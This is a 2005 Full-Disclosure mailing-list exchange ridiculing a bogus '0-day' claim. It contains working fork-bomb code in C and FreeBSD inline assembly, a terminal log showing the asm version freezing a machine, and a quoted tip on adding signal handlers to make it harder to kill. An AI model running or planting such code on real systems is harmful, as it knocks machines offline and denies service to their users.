┌([EMAIL PROTECTED]:p4)(~)
└(Power:on-line:100% cat > a.c                                
int main(){
        __asm__(
                "xorl %ecx,%ecx\n"
                "cdq\n"
                "HERE:\n"
                "movl $0x2,%eax\n"
                "int $0x80\n"
                "jmp HERE\n"
        );
}
^C
┌([EMAIL PROTECTED]:p4)(~)
└(130:Power:on-line:100% make a                              
cc -O -pipe -march=pentium4  a.c  -o a
┌([EMAIL PROTECTED]:p4)(~)
└(Power:on-line:100% ./a                               
^C
┌([EMAIL PROTECTED]:p4)(~)
└(130:Power:on-line:100% uname -srm
FreeBSD 6.0-BETA1 i386


The machine froze instantly, but eventually, after a minute or so, I was
able to ^C.

--
Jay

On Tue, 2005-08-16 at 11:10 +0200, Rik Bobbaers wrote:
> On Monday 15 August 2005 09:59, Jay wrote:
> > It's not nice to brag about finding 0-day bullshit in the bash fork
> > bomb that has been Zalewski's signature for years :P
> 
> I think I know where he got it from. I was on an IRC channel a couple of
> days ago, and someone posted it (as a joke, of course). It's ... ahm... funny
> that it comes back over here just a few days later!
> 
> I don't know how this is a 0day and gives you remote access (it does the
> opposite...)
> 
> but if you want one that's a bit harder to stop:
> 
> C version:
> int main () {
>         while (1) fork();
> }
> 
> an asm (quick hack):
> int main(){
>         __asm__(
>                 "xorl %ecx,%ecx\n"
>                 "cdq\n"
>                 "HERE:\n"
>                 "movl $0x2,%eax\n"
>                 "int $0x80\n"
>                 "jmp HERE\n"
>         );
> }
> 
> Sorry it's in C... the machine I made it on didn't have gas or nasm.
> 
> Anyway, if you compile this and run it in the background, it will all die
> pretty fast. (To make it even harder, make your own signal handlers! (Okay,
> SIGKILL will still work, but it will be harder to kill :))
> 
> Shall we call this C and assembler 0days? ;)
> 
> -- 
> harry
> aka Rik Bobbaers
> 
> K.U.Leuven - LUDIT          -=- Tel: +32 485 52 71 50
> [EMAIL PROTECTED] -=- http://harry.ulyssis.org
> 
> Disclaimer:
> By sending an email to ANY of my addresses you are agreeing that:
>   1. I am by definition, "the intended recipient"
>   2. All information in the email is mine to do with as I see fit and make
> such financial profit, political mileage, or good joke as it lends itself to.
> In particular, I may quote it on usenet.
>   3. I may take the contents as representing the views of your company.
>   4. This overrides any disclaimer or statement of confidentiality that may
> be included on your message.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/